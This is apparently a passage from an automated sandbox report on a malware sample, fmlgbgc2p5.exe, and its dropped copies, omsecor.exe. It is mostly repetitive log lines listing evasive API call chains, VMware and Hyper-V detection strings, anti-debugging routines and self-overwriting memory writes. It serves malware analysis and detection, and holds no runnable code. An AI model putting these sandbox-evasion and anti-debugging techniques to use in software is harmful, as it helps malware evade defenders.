            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_14-5814
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_2-5814
            Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_14-5814
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_2-5814
            Source: C:\Users\user\AppData\Roaming\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_7-5813
            Source: C:\Users\user\AppData\Roaming\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_7-5813
            Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_13-3843
            Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_14-5876
            Source: C:\Users\user\AppData\Roaming\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_4-3846
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-5876
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-3843
            Source: C:\Users\user\AppData\Roaming\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_7-5875
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeAPI coverage: 8.6 %
            Source: C:\Windows\SysWOW64\omsecor.exeAPI coverage: 8.6 %
            Source: C:\Windows\SysWOW64\omsecor.exeAPI coverage: 8.6 %
            Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 7456Thread sleep time: -40000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 6308Thread sleep time: -40000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_004012C0 FindFirstFileA,0_2_004012C0
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040ABD9 FindFirstFileW,FindClose,2_2_0040ABD9
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,2_2_00408248
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 4_2_004012C0 FindFirstFileA,4_2_004012C0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_0040ABD9 FindFirstFileW,FindClose,7_2_0040ABD9
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,7_2_00408248
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_004012C0 FindFirstFileA,13_2_004012C0
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_0040ABD9 FindFirstFileW,FindClose,14_2_0040ABD9
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,14_2_00408248
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 16_2_004012C0 FindFirstFileA,16_2_004012C0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_0040ABD9 FindFirstFileW,FindClose,18_2_0040ABD9
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,18_2_00408248
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 23_2_004012C0 FindFirstFileA,23_2_004012C0
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_0040ABD9 FindFirstFileW,FindClose,24_2_0040ABD9
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,24_2_00408248
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 26_2_004012C0 FindFirstFileA,26_2_004012C0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_0040ABD9 FindFirstFileW,FindClose,28_2_0040ABD9
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,28_2_00408248
            Source: Amcache.hve.6.drBinary or memory string: VMware
            Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: omsecor.exe, 00000007.00000002.1840387008.0000000000622000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589585236.0000000000504000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589585236.00000000004CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: omsecor.exe, 00000007.00000002.1840387008.0000000000622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>Y6P
            Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.6.drBinary or memory string: vmci.sys
            Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.6.drBinary or memory string: VMware20,1
            Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW wl%SystemRoot%\system32\mswsock.dll#
            Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
            Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeAPI call chain: ExitProcess graph end nodegraph_0-3547
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeAPI call chain: ExitProcess graph end nodegraph_0-3844
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeAPI call chain: ExitProcess graph end nodegraph_0-3857
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeAPI call chain: ExitProcess graph end nodegraph_2-5904
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_4-3550
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_4-3860
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_4-3847
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_7-5903
            Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_13-3547
            Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_13-3844
            Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_13-3857
            Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_14-5904
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAPI call chain: ExitProcess graph end node

            Anti Debugging

            barindex
            Source: C:\Windows\SysWOW64\omsecor.exeDebugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleepgraph_14-6412
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeDebugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleepgraph_2-6412
            Source: C:\Users\user\AppData\Roaming\omsecor.exeDebugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleepgraph_7-6415
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401662
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_00404854 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__invoke_watson,GetProcAddress,GetProcAddress,__invoke_watson,0_2_00404854
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_00421170 GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,___security_init_cookie,0_2_00421170
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00406A50
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401662
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00404121
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_0040213B SetUnhandledExceptionFilter,0_2_0040213B
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004032B8
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CD66
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 4_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00406A50
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 4_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00401662
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 4_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00404121
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 4_2_0040213B SetUnhandledExceptionFilter,4_2_0040213B
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_004032B8
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CD66
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00406A50
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00401662
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00404121
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040213B SetUnhandledExceptionFilter,13_2_0040213B
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004032B8
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040CD66
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 16_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00406A50
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 16_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00401662
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 16_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00404121
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 16_2_0040213B SetUnhandledExceptionFilter,16_2_0040213B
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_004032B8
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0040CD66
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 23_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00406A50
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 23_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00401662
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 23_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00404121
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 23_2_0040213B SetUnhandledExceptionFilter,23_2_0040213B
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,24_2_004032B8
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_0040CD66
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 26_2_00406A50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00406A50
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 26_2_00401662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00401662
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 26_2_00404121 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00404121
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 26_2_0040213B SetUnhandledExceptionFilter,26_2_0040213B
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,28_2_004032B8
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0040CD66

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeMemory written: C:\Users\user\Desktop\fmlgbgc2p5.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeMemory written: C:\Users\user\AppData\Roaming\omsecor.exe base: 400000 value starts with: 4D5AJump to behavior
